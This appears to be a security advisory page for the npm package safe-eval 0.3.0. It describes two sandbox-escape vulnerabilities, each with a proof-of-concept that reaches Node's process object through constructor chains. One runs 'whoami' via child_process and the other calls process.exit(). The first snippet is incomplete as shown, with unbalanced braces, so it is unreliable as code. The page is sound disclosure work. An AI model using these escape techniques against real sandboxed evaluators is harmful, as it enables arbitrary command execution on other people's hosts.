safe-eval@0.3.0 vulnerabilities

Safer version of eval()

Direct Vulnerabilities

Known vulnerabilities in the safe-eval package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Sandbox Escape

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

POC by Anirudh Anand (for node 12.13.0)

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
   return bad;

const untrusted = `(${theFunction})()`;

How to fix Sandbox Escape?

There is no fixed version for safe-eval.

  • C
Sandbox Escaping

[safe-eval] is a version of eval, claiming to be safer.

Affected versions of this package are vulnerable to Sandbox Escaping. User input is not sanitized before being passed on to the safeEval function. A malicious user could access the object constructors, allowing access to the standard library, then escaping the sandbox.

Proof of Concept:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

How to fix Sandbox Escaping?

Upgrade safe-eval to version 0.4.0 or higher.